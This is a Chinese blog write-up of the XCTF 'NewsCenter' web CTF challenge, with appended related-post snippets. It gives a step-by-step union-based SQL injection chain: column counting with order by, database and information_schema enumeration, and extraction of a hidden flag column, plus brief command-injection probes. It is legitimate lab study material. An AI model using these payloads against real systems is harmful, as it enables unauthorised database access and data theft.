攻防世界Web新手题 NewsCenter

于 2024-07-02 16:04:18 发布
阅读量453 收藏 9
点赞数 8
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52481261/article/details/140128331
版权

题目界面:

搜索框搜索文字会有相应返回,应该能判断search搜索框是用于进行注入的注入点

判断漏洞类型:命令注入  or  SQL注入

区别:命令注入是指攻击者通过在应用程序中注入恶意系统命令来攻击系统,而SQL注入则是攻击者通过在应用程序中注入恶意SQL查询来攻击数据库系统。

SQL注入判断:

  • ?id=1'(页面空白)在最后添加#可返回网页,说明#可以注释原始查询中的其他部分使得只有输入的SQL查询产生效果

命令注入判断:

  • cat<123(无反应)
  • ls -t>a(无反应)

 从页面返回能判断是SQL注入

字段数判断

?id=1' order by 3#(有返回)

?id=1' order by 4#(页面空白)

 说明仅有三个字段

回显判断

使用联合查询

?id=1' union select 1,2,3#

说明第二列第三列会有返回

数据库查询

?id=1' union select 1,2,database()#

数据库名字为news

数据表查询

?id=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='news'#

 

数据库表名为secret_table

表中列查询

?id=1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'#

 这里很明显了,我们需要查看fl4g列

?id=1' union select 1,2,group_concat(fl4g) from secret_table#

找到flag 

Lzi.
关注
攻防世界-NewsCenter
weixin_46784800的博客
11-12 1505
攻防世界-NewsCenter 首先,进入靶场网站,发现是一个News界面,并且界面存在一个搜索入口,此时的第一感觉就是,这道应该是一道sql注入的目(后来发现确实是这样) 在搜索框输入一系列数字或字母进行搜索,可搜索出来一些News: 打开HackBar,在POST请求值处的字符串末尾输入单引号,尝试是否能发生单引号闭合: 发现请求的返回值为500,则说明该请求在服务器的数据库中发生了单引号闭合,导致数据库查询失败,这时已经可以实锤本为数据库注入的目了。 首先,通过order语句,判断查询
攻防世界 WEB NewsCenter
ChaoYue_miku的博客
01-08 262
攻防世界 WEB NewsCenter NewsCenter:   目只有一个搜索框,下面显示搜索结果,最先考虑的就是sql注入,先简单构造' or '1=1,果然返回了所有新闻(7条)查看网页源码,发现这里是post方式,可以考虑使用sqlmap。   但是如此形式的sql漏洞应该还有别的方法,毕竟这一看就没有任何过滤验证,也没有提前预编译,是最基础的sql漏洞了,在这里尝试手工构造语句,看看能不能获得什么信息。   通常的方法就是单引号、1、2等尝试,然...
攻防世界NewsCenter
qq_45955869的博客
05-19 708
提示:攻防世界新手模式难度2NewsCenter提示:以下是本篇文章正文内容,下面案例可供参考比较基础,比较简单。
攻防世界NewsCenter
weixin_51030879的博客
07-23 1260
攻防世界NewsCenter
攻防世界-NewsCenter
weixin_39579781的博客
05-06 1307
目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的目。接下来判断能否进行sql注入:输入 hi,有搜索结果,如下图:输入hi’,无结果,如下图:初步判定是hi‘后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的’形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个‘导致语法错误,而加入#将后面的’注释掉之后不会报错,可确定为字符型SQL注入。
攻防世界NewsCenter
金 帛的博客
04-09 2519
攻防世界WP
去除cnewscenter弹窗_攻防世界 web进阶区 NewsCenter
weixin_39874379的博客
12-22 9257
攻防世界 web进阶区 NewsCenter首先我们打开网页,发现目中只有一个搜索框,然后通过查看源代码等方式都无法获得任何有用的信息。所以目肯定是从这个搜索框入手的,那么就首先抓包试试。抓到这样一些数据,但是经过尝试也没有什么办法获取信息,只发现了搜索使用的是post请求。最后想到了一般这样的搜索框可能会存在sql注入,所以及逆行尝试。但是由于手注的技术实在是太差了,就先用sqlmap来...
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界web练习18、19、20
H_S2022的博客
07-13 228
攻防世界web练习
攻防世界-web-newscenter
wuh2333的博客
05-30 1097
攻防世界,sql注入
攻防世界---web---NewsCenter
最新发布
2201_75556700的博客
05-18 461
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 1936
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
攻防世界---NewsCenter
weixin_43803070的博客
07-15 496
废话不多说,直接上思路。 ** 手工注入: ** 1' //报错, 判断字段: 1' order by 3# //最终我们得到是三个字段,在这里们用--+代替#,竟然报错。 回显字段: -1' union select 1,2,3# 爆出数据库(两种方法): -1' union select 1,2,database()# -1' union select 1,2,group_conc...
攻防世界 web进阶区 NewsCenter
m0_51395584的博客
06-17 850
攻防世界 web进阶区 NewsCenter 简单的SQL联合查询注入
攻防世界wp-newscenter
weixin_43916608的博客
07-21 260
根据搜索条件,考虑目为sql注入 1. 输入语句’ and 0 union select 1,2,3 from information_schema.tables#,查看数据库返回列数 查询结果说明,数据库返回的列数为3 2.查询数据库名称 ’ and 0 union select 1,2,table_schema from information_schema.tables#,查询结果可知,数...
攻防世界web新手答案_攻防世界XCTF-WEB-新手练习区(1-3)
weixin_39884100的博客
11-21 1331
第一:view_source目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。通过描述提示发现鼠标右键不能能使用,大概是让我们不让我们查看网页源代码,可以按f12打开开发者工具进行查看,flag是:cyberpeace{ac9d97dc4b075ec9a16834300222ef10}第二:robots目描述:X老师上课讲了Robots协议,小宁同学却上课打...
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来了解更多信息。此外,NewsCenter还涉及到CTF(Capture The Flag)比赛和SQL注入攻击的内容。在这个应用程序中,有两个表,分别是news和secret_table,我们需要从secret_table表中找到flag(标志)。通过构造SQL语句,并利用搜索(search)功能,我们可以使用union select和group_concat函数来获取所需的信息。最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值